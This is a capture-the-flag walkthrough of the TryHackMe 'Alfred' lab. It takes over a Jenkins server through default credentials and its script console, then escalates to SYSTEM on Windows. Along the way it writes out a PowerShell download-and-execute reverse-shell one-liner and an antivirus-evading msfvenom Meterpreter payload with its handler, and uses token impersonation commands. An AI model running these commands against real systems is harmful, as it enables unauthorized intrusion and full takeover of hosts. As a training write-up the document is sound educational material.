DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Alfred - TryHackMe writeup

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

EasyWindowsJenkinsMetasploitPrivilege escalation8 min read

Open the room on TryHackMe ↗ View on GitHub

Step 1: Reconnaissance

:~$ nmap -sV 10.10.219.84
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-04 20:35 IST
Nmap scan report for 10.10.219.84
Host is up (0.19s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap scan reveals three open ports:

Exploring Port 80

Since port 80 is usually the default web service, let's visit it in the browser:

image

Unfortunately, there's nothing useful here.

Checking Out Port 8080 (Jenkins)

Given that the Jetty server is running on port 8080 and the version looks outdated, let’s take a look.

image

Let's try the classic move: default credentials admin:admin.

image

Bingo! We're in 😎 — call me a genius!

Step 2: Exploitation

While scrolling through the Jenkins interface, I finally found something promising under Manage Jenkins → Script Console.

image

After experimenting for a bit, I figured out how to run commands. Let’s test it by listing the contents of the C: drive using:

cmd = "cmd.exe /c dir"
println cmd.execute().text

image

Nice! We got some output. Now let’s move on to getting a reverse shell.

Preparing the Reverse Shell

We'll use Nishang, a collection of PowerShell scripts for exploitation. Clone the repo:

git clone https://github.com/samratashok/nishang

Navigate to the Shells directory:

cd nishang/Shells/

Now, we’ll host the reverse shell script using a simple Python HTTP server:

python3 -m http.server

image

Meanwhile, set up a Netcat listener on a different port to catch the shell:

nc -lnvp 1234

Executing the Reverse Shell

We’ll download and execute the reverse shell script on the target machine via the Jenkins Script Console:

cmd = "powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port"
println cmd.execute()

Example with my setup:

cmd = "powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.14.127:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.14.127 -Port 1234"
println cmd.execute()

And... boom! Got the reverse shell back:

image

Step 3: Post Exploitation

User Flag.txt

We begin by retrieving the user.txt file from the compromised system:

cat 'C:\Users\bruce\Desktop\user.txt'

image

Step 4: Privilege Escalation

Switching to Meterpreter

To make privilege escalation easier and more efficient, let’s upgrade to a Meterpreter shell using a custom payload.

Generate the payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<your-ip> LPORT=<your-port> -f exe -o shell-test.exe

This payload uses the x86/shikata_ga_nai encoder to help evade antivirus detection.

Setting Up the Handler

Start Metasploit Framework Console:

msfconsole -q

Configure the handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-thm-ip>
set LPORT 5555
run

Delivering the Payload

Now, we need to transfer the shell-test.exe file to the target. From the directory where your payload is saved (e.g., /home/user), run a simple Python server:

python3 -m http.server

On the target (via the reverse shell), download the file:

powershell "(New-Object System.Net.WebClient).DownloadFile('http://<your-thm-ip>:8000/shell-test.exe','shell-test.exe')"

image

Execute the payload:

Start-Process "shell-test.exe"

image

Once the Meterpreter shell is received, type:

shell

image

Privilege Escalation via Token Impersonation

Check current privileges:

whoami /priv

image

We see SeDebugPrivilege and SeImpersonatePrivilege are enabled — perfect for token impersonation.

Load the incognito module in Meterpreter:

load incognito

If load incognito fails, try use incognito or ensure your Metasploit is updated.

Press Ctrl+C to exit the shell and return to the Meterpreter prompt.

List available tokens:

list_tokens -g

image

We can see that the BUILTIN\Administrators token is available.

Impersonate it:

impersonate_token "BUILTIN\\Administrators"

image

Final Step: Root Flag

Before reading the root flag, let’s migrate to a stable system process for persistence. View running processes:

image

Choose a stable process and migrate to it:

migrate <PID>

image

Root Flag.txt

Once you have SYSTEM privileges, retrieve the root flag:

type 'C:\Windows\System32\config\root.txt'

image